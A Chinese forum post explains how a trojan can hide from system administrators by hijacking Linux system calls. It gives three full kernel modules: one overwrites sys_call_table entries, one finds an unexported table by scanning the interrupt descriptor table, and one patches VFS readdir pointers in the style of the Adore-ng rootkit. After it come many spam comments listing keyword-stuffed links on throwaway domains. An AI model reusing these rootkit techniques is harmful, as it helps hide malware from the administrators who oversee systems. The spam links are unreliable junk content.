如果一个木马要隐藏起来,不被系统管理员发现。截获系统调用似乎是必须的。大部分情况
下,通过修改系统调用表来实现系统调用的劫持。
下面是一个典型的截获系统调用的模块:
模块一:
#include
#include
#include
#include
#include
#include
#include
#include
#include
MODULE_LICENSE("GPL");
extern void* sys_call_table[]; /*sys_call_table is exported, so we can access
it. But in some system this will cause problem */
int (*orig_mkdir)(const char *path); /*the original systemcall*/
int hacked_mkdir(const char *path)
{
return 0; /*everything is ok, but he new systemcall
does nothing*/
}
int init_module(void) /*module setup*/
{
orig_mkdir=sys_call_table[SYS_mkdir];
sys_call_table[SYS_mkdir]=hacked_mkdir;
return 0;
}
void cleanup_module(void) /*module shutdown*/
{
sys_call_table[SYS_mkdir]=orig_mkdir; /*set mkdir syscall to the origal
one*/
}
用这种方法实现系统调用有个前提,就是系统必须导出sys_call_table内核符号,但是在
2.6内核和有些2.4内核的系统(比如redhat as 3)中,sys_call_table不再导出。也就是
说模块中不能再通过简单的extern void *sys_call_table[];来获得系统调用表地址。
所幸的是,即使内核不导出sys_call_table,也可以在内存中找到它的地址,下面是它的实
现方法:
模块二:(2.4和2.6内核测试通过)
#include
#include
#include
#include
#include
MODULE_LICENSE("GPL");
MODULE_AUTHOR("xunil@bmy");
MODULE_DESCRIPTION("Different from others, this module
automatically locate the entry of sys_call_table !");
unsigned long *sys_call_table=NULL;
asmlinkage int (*orig_mkdir)(const char *,int);
struct _idt
{
unsigned short offset_low,segment_sel;
unsigned char reserved,flags;
unsigned short offset_high;
};
unsigned long *getscTable(){
unsigned char idtr[6],*shell,*sort;
struct _idt *idt;
unsigned long system_call,sct;
unsigned short offset_low,offset_high;
char *p;
int i;
/* get the interrupt descriptor table */
__asm__("sidt %0" : "=m" (idtr));
/* get the address of system_call */
idt=(struct _idt*)(*(unsigned long*)&idtr[2]+8*0x80);
offset_low = idt->offset_low;
offset_high = idt->offset_high;
system_call=(offset_high<<16)|offset_low;
shell=(char *)system_call;
sort="\xff\x14\x85";
/* get the address of sys_call_table */
for(i=0;i<(100-2);i++)
if(shell[i]==sort[0]&&shell[i+1]==sort[1]&&shell[i+2]==sort[2])
break;
p=&shell[i];
p+=3;
sct=*(unsigned long*)p;
return (unsigned long*)(sct);
}
asmlinkage int hacked_mkdir(const char * pathname, int mode){
printk("PID %d called sys_mkdir !\n",current->pid);
return orig_mkdir(pathname,mode);
}
static int __init find_init(void){
sys_call_table = getscTable();
orig_mkdir=(int(*)(const char*,int))sys_call_table[__NR_mkdir];
sys_call_table[__NR_mkdir]=(unsigned long)hacked_mkdir;
return 0;
}
static void __exit find_cleanup(void){
sys_call_table[__NR_mkdir]=(unsigned long)orig_mkdir;
}
module_init(find_init);
module_exit(find_cleanup);
getscTable()是在内存中查找sys_call_table地址的函数。
每一个系统调用都是通过int 0x80中断进入核心,中断描述符表把中断服务程序和中断向量
对应起来。对于系统调用来说,操作系统会调用system_call中断服务程序。system_call函
数在系统调用表中根据系统调用号找到并调用相应的系统调用服务例程。idtr寄存器指向中
断描述符表的起始地址,用__asm__ ("sidt %0" : "=m" (idtr));指令得到中断描述符表起
始地址,从这条指令中得到的指针可以获得int 0x80中断服描述符所在位置,然后计算出
system_call函数的地址。反编译一下system_call函数可以看到在system_call函数内,是
用call sys_call_table指令来调用系统调用函数的。因此,只要找到system_call里的call
sys_call_table(,eax,4)指令的机器指令就可以获得系统调用表的入口地址了。
对于截获文件系统相关的系统调用,Adore-ng rootkit提供了一种新的方法。简单的说,就
是通过修改vfs文件系统的函数跳转表来截获系统调用,这种方法不用借助于系统调用表。
下面是它的实现方法:
模块三:(2.4和2.6内核测试通过)
#include
#include
#include
#include
#include
#include
MODULE_AUTHOR("xunil@BMY");
MODULE_DESCRIPTION("By utilizing the VFS filesystem, this module can capture
system calls.");
MODULE_LICENSE("GPL");
char *root_fs="/";
typedef int (*readdir_t)(struct file *,void *,filldir_t);
readdir_t orig_root_readdir=NULL;
int myreaddir(struct file *fp,void *buf,filldir_t filldir)
{
int r;
printk("<1>You got me partner!\n");
r=orig_root_readdir(fp,buf,filldir);
return r;
}
int patch_vfs(const char *p,readdir_t *orig_readdir,readdir_t new_readdir)
{
struct file *filep;
filep=filp_open(p,O_RDONLY,0);
if(IS_ERR(filep))
return -1;
if(orig_readdir)
*orig_readdir=filep->f_op->readdir;
filep->f_op->readdir=new_readdir;
filp_close(filep,0);
return 0;
}
int unpatch_vfs(const char *p,readdir_t orig_readdir)
{
struct file *filep;
filep=filp_open(p,O_RDONLY,0);
if(IS_ERR(filep))
return -1;
filep->f_op->readdir=orig_readdir;
filp_close(filep,0);
return 0;
}
static int patch_init(void)
{
patch_vfs(root_fs,&orig_root_readdir,myreaddir);
printk("<1>VFS is patched!\n");
return 0;
}
static void patch_cleanup(void)
{
unpatch_vfs(root_fs,orig_root_readdir);
printk("<1>VFS is unpatched!\n");
}
module_init(patch_init);
module_exit(patch_cleanup);
190.73.133.* 于 2007-06-11 02:53:07发表:
b3478a012e4b33a9e91818ea39c5b15d http://foto-o-immagine-alpi-appennini.dtifhu.net.in/ http://case-in-vendita-termini-imerese.ooqqld.net.in/ http://fattoria-didattica-scuola-primaria-abruzzo.mksqkw.net.in/ http://letargo-di-una-tartaruga-d-acqua.kfxrfs.net.in/ http://che-cos-e-un-pop-up.hhknox.net.in/ http://ansa-4-02-2002-batterio-ospedale.innltr.net.in/ http://legge-n-662-23-12-1996.innltr.net.in/ http://foto-pisciata-all-aperto-donna-uomo.ooqqld.net.in/ http://alia-l-arcipelago-del-fantastico.ooqqld.net.in/ http://roberto-patricolo-san-giorgio-palermo.hhknox.net.in/ 319dbbb4ab069a1bfb4a4d4d12c61dcd
190.74.211.* 于 2007-06-09 02:53:33发表:
fc34d288c39aaf037a76d72536fa5b91 http://traduzione-italiano-francese-tecnico-gratis.iumzde.org/ http://ministero-interno-paese-ce-2004-38.mbxbva.org/ http://maratona-di-new-york-iscrizioni.qjgasd.org/ http://discoteca-lombardia-osnago-lecco-deluxe-clubbing.mbxbva.org/ http://cerco-satellite-riesce-vedere-cose-vicino.iumzde.org/ http://macchina-cucire-manuale-d-uso.qjgasd.org/ http://bed-and-breakfast-limone-garda-jacuzzi.lbpwqo.org/ http://decreto-legislativo-n-80-1998.qjgasd.org/ http://business-consulting-veneziani-veneziani-matteo.lbpwqo.org/ http://eclisse-di-sole-29-03-2006.lbpwqo.org/ e44c2d91c99facb894d3b26e91151560
200.8.189.* 于 2007-06-08 04:19:40发表:
1a1ede1df6225a19dcfd64abb6c58d14 http://uso-auto-aziendale-anno-2006.kkwhbs.org/ http://caparezza-la-mia-parte-intollerante-lyrics.zouvtz.org/ http://aereoporto-malpensa-2-posteggio-auto.incgek.org/ http://alias-maya-7-game-ita.lykglu.org/ http://voglia-di-te-riccardo-scamarcio.lykglu.org/ http://medal-of-honor-allied-assault-codice.rpddkk.org/ http://locale-cenone-fine-anno-provincia-siracusa.ulhxdx.org/ http://casadei-orchestra-domain-casadei-it.fjhozm.org/ http://centri-per-l-impiego-milano.bzeitz.org/ http://cartuccia-fax-lab-220-olivetti.ulhxdx.org/ 2e2f8656ca7971267ae7180fc612fe21
201.227.51.* 于 2007-06-07 07:02:43发表:
ba4bce96b1603628c4530e56771f5bc4 http://gta-liberty-city-trucco-ps2.gjtkci.info/ http://devo-fare-ricerca-dinosauro-volante-carnivoro.zjtbra.info/ http://lezioni-di-pianoforte-on-line.lgrhpd.info/ http://itinerario-pesca-mar-ligure-ponente.ytqkdb.info/ http://marginalita-handicappati-contesto-sociale-integrazione.zjtbra.info/ http://il-rito-della-santa-messa.vrnzgy.info/ http://sito-facolta-ingegneria-meccanica-roma-tre.ciymwb.info/ http://elenco-azienda-cinese-accessorio-calzatura.urajxu.info/ http://collettori-solario-ad-aria-ch.ciymwb.info/ http://club-viva-dominicus-santo-domingo.alflim.info/ 6dea66dd0952ca77d762129bda0df247
200.85.165.* 于 2007-06-06 10:03:39发表:
11001e75f313617b939f2886c1626de2 http://foto-di-jamie-lee-curtis.duajwe.info/ http://miscele-solido-acqua-metodo-pompaggio.xaotvu.info/ http://solo-fosse-vero-marc-levy.xaotvu.info/ http://genova-nervo-albergo-hotel-pensione.xaotvu.info/ http://pomodoro-del-vesuvio-al-forno.qirjux.info/ http://spyro-a-heros-tail-soluzione.jknrtq.info/ http://pescare-mosca-costruzione-mosca-emergente.yyunae.info/ http://moto-cariche-campo-elettrico-problema.qirjux.info/ http://cambio-modificato-x-vw-golf.yyunae.info/ http://cerca-sosta-camper-europa-aperta-inverno.xaotvu.info/ 11bac96dbb32ab2fd1a6f4018c996a56
190.45.86.* 于 2007-06-05 15:05:59发表:
c5644884f75390c69508302558d3c265 http://pressa-compostaggio-fango.dvtuzm.info/ http://anagrafe-canina-sterilizzazioni-ragusa.dhvvfi.info/ http://metello-cava-tirreni.wkermn.info/ http://arena-guanto-palmati.dhvvfi.info/ http://meteopiemonte-it.boixkk.info/ http://mazda-mx-crossport-recensione.boixkk.info/ http://peculiarita-computer-msx.dvtuzm.info/ http://manuale-istruzione-f80.dvtuzm.info/ http://auto-omologabili-autocarro.fwpjkf.info/ http://tripi-moretti-tsf.fwpjkf.info/ 4080af707aca2bbb96231fb1b4743d28
84.126.225.* 于 2007-06-04 20:32:03发表:
43ea722713e6c09a5f2f2fd5becad38a http://appartamento-affitto-illimitato-presso-firenze.dlmpxx.org/ http://comune-di-san-giovanni-valdarno.nfvzoo.org/ http://aggiornamento-win-fax-pro-gratis.pgbdyc.org/ http://strat-site-www-accordo-it.nfvzoo.org/ http://valigia-porta-pedalini-effetto-chitarra.dqiqbg.org/ http://dottorato-lex-uniba-it-due.vprmbs.org/ http://lichen-ruber-planus-caso-clinico.xcwjal.org/ http://italia-piemonte-liquore-grappa-vino-rosati.pgbdyc.org/ http://interruzione-volontaria-gravidanza-aspetti-medico-legale.dqiqbg.org/ http://coppa-italia-napoli-parma-tv.pgbdyc.org/ e2344a7b53a49ae4d6fdb2a64dbf9945
84.122.75.* 于 2007-06-04 00:51:29发表:
b571189de0615854a3be7181726dc68a http://agorauniparthenope.nlamku.org/connettore-adattatore-lemo-bnc/index.htm http://giuliocozzolibiografia.nlamku.org/iscrizione-b-n-d-o-o/index.htm http://dtctrilogyanello.beajbg.org/meteo-tg5-porretta-terme/index.htm http://produzionesilosmonolitici.akqcvy.org/parto-indolore-viterbo/index.htm http://soniaformentiflauto.nlamku.org/autodemolizione-roma-massimina/index.htm http://hundaycarpi.seyzuo.org/allevamento-pollame-prova-livorno/index.htm http://contestarecontravvenzioneztl.seyzuo.org/agip-programmare-card/index.htm http://irmaallestimentometallico.seyzuo.org/attili-clinica-pancreatiti-cronica/index.htm http://prezzosaecocaffc3a8.inkrxe.org/medico-cardiologi-policlinico-gemello/index.htm http://metzelerocchiale.akqcvy.org/minigonna-mercedes-slk/index.htm 83869c431dabc6ba13fe3e3c64cc8ac5
201.232.169.* 于 2007-06-03 07:00:13发表:
e96e8c4bed9c7c7ec5726b3049809d30 http://violinismiserosuonare.lskson.org/romagtwpt-ope-sda-it/index.htm http://cascataniagaraontniagaraparkscommission.shxghd.org/piaggio-x8-200-recensione-scheda-tecnica/index.htm http://trullopasolini.shxghd.org/eliminazione-virus-trojanclicker-win32/index.htm http://sintomoerniacervicalemolla.ksibgs.org/vanoni-valentina-discografia/index.htm http://giuseppesignoriunofficialfanpage.bdizoa.org/parafrasi-purgatorio-dantesco/index.htm http://officinacampionrovigo.lskson.org/ga-7vm400a-fa/index.htm http://golosarhopasticceria.bdizoa.org/cartamodelli-abiti-da-sposa/index.htm http://controsoffittosimillegnopoliuretano.lskson.org/sirio-de-leo-giocatore-calcio-93/index.htm http://filmhovogliate.bdizoa.org/booster-amplificatore-segnale-gsm/index.htm http://canettisefarditi.bdizoa.org/decreto-santuario-madonna-arma-cerchiara-calabria/index.htm 691e5261e7f26fe9bfca38d324fb1940
201.232.169.* 于 2007-06-02 11:19:22发表:
4672f7c574864235586e881e1eb1aa44 http://cioccolateriaviasanvittoremilano.nlamku.org/storia-monaca-clausura-scheda/index.htm http://prevenditebrignano.inkrxe.org/adattatore-pcmci-usb/index.htm http://tritacarneamb.seyzuo.org/danea-tiziano/index.htm http://alessandramusolini.nlamku.org/integratore-effervescente-calcio-caltrate-20-compresse/index.htm http://annalisascaraffiatorino.seyzuo.org/martini-fondamento-anatomia-fisiologia-usato/index.htm http://orologiobretling.akqcvy.org/erba-curative-contro-prurito/index.htm http://omeliafestasantaelisabettadungheria.inkrxe.org/giochi-disnei/index.htm http://dtctrilogyanello.beajbg.org/andrea-delitio-cellino-attanasio/index.htm http://recordatiamianto.inkrxe.org/abbigliamento-it-aereonatica/index.htm http://iltinellosolagna.beajbg.org/paolo-cerretelli-invecchiare-bene/index.htm 63aa5c5d6850cbd0ab7a0b3644130d9e
88.9.85.* 于 2007-06-01 16:30:58发表:
726651127150b1b086f06a78a97387f9 http://cercielloemanuel.leikrf.org/pillola-belara-ricerca-gravidanza/index.htm http://stampantemultifunzioneepsondx6000.uzghnh.org/paese-tibetano-canossa/index.htm http://1984decretopresascart.pdjkai.org/sfondo-suggestivo-kawasaki/index.htm http://tecavenditarettile.gkgobd.org/crivellari-tobia/index.htm http://ipodvideotoccalomano.uzghnh.org/guardia-volontaria-ambientali-bari-via-durazzo/index.htm http://atirx1650se512mb.uzghnh.org/aggiornamento-gp500/index.htm http://giubottiaviatorepelle.mljuyb.org/c-27era-una-volta-in-america/index.htm http://gaggiaespressomacchinacaffc3a8.uzghnh.org/ricetta-cavoletti-brussels/index.htm http://castellopiantorogatorie.mljuyb.org/esorcista-genesi-trailer-alta-risoluzione/index.htm http://villaggiodegliulivopalinuro.gkgobd.org/ricetta-pentola-pressione-aeternum/index.htm 5447788e0ee79eeca3d64876f41eb1cf
190.72.246.* 于 2007-05-30 08:52:42发表:
716762a128973fcea86c9f48c72437a5 http://pegekq.org/turismo/turismo-salinopolis-para.html http://wfcqxw.org/profissionais/profissionais-trabalham-ambulancia.html http://ovvkft.org/acao/acao-geleira.html http://pegekq.org/amarracoes/amarracoes-espirituais.html http://mnopyi.org/serra/serra-marmore-bosh.html http://mnopyi.org/formacao/formacao-de-vegetais-no-mundo.html http://ovvkft.org/artigos/artigos-medicina-veterinaria.html http://wfcqxw.org/comunidade/comunidade-europeia-carvao-aco.html http://wfcqxw.org/festa/festa-e-evento-florianopolis.html http://ovvkft.org/wallmart/wallmart-goiania.html a91f06099d8916d08fc86aebeef191c8
201.208.37.* 于 2007-05-29 07:38:12发表:
c3bdb6e6db6a32005d354ad34fe989c8 http://grpytd.org/deputado/deputado-dimas-ramalho.html http://sxrzpn.org/farelo/farelo-algodao-consumidor-goias.html http://sxrzpn.org/banda/banda-balanca-nenem.html http://lcitij.org/programa/programa-kazza-capoeira.html http://lcitij.org/outdoors/outdoors-publicitarios-brasil.html http://xwqumn.org/fabricacao/fabricacao-porta-formica.html http://xvqeoy.org/estado/estado-de-minas-cidade-com-os-maiores-numero-de-crime-quadro-de-minas-gerais.html http://grpytd.org/tudo/tudo-e.html http://grpytd.org/familia/familia-caymmi.html http://xvqeoy.org/cheater/cheater-jogar-dod-source.html ea84313ff4cf4b8bb8ec851c693c83a5
89.156.112.* 于 2007-05-28 15:29:00发表:
cd5db3d266dcd238cc80f8420dc77d7b http://ifrtox.info/luiz/luiz-miguel-bolero.html http://pegekq.info/video/video-bbb-7-maiores.html http://ifrtox.info/fazer/fazer-mnn.html http://mnopyi.info/resultado/resultado-supletivo-2005-06-cre.html http://grpytd.info/dica/dica-jogo-scarface.html http://xvqeoy.info/febem/febem-greve-suspensao.html http://xvqeoy.info/quem/quem-fundou-a-onu.html http://grpytd.info/lelia/lelia-soares-uol-br.html http://mnopyi.info/zona/zona-de-ressurgencia.html http://grpytd.info/mat/mat-uol-br.html 921da3b25f91ff5411abb8e73f72697f
85.55.32.* 于 2007-05-27 23:44:47发表:
b778dcd279031078b40eb7ca11417a04 http://sxrzpn.info/imagem/imagem-papa-leguas.html http://sxrzpn.info/fabrica/fabrica-de-garrafoes-de-agua-mineral.html http://ovvkft.info/projeto/projeto-didaticos-em-educacao-infantil.html http://sxrzpn.info/tipo/tipo-de-alcool.html http://wfcqxw.info/beach/beach-culture-moda-praia.html http://wfcqxw.info/carta/carta-cigana-cruz.html http://wfcqxw.info/fazer/fazer-melhorar-auto-estima.html http://ovvkft.info/efeito/efeito-colaterais-diu-mirena.html http://sxrzpn.info/mayara/mayara-keury.html http://sxrzpn.info/expansao/expansao-comercial-francesa.html 6d9dd05b81c19c63ae8e87cbbcfe2050
190.74.211.* 于 2007-05-16 03:21:01发表:
http://1434924eaa7d933712dae248f5174438-t.qwoypw.info 1434924eaa7d933712dae248f5174438 http://1434924eaa7d933712dae248f5174438-b1.qwoypw.info 1434924eaa7d933712dae248f5174438 http://1434924eaa7d933712dae248f5174438-b3.qwoypw.info b43a48a848da56275457e93295654b68
spy1985 于 2007-04-09 21:42:30发表:
写的不错~~
何哥 于 2005-11-15 01:11:39发表:
谢谢分享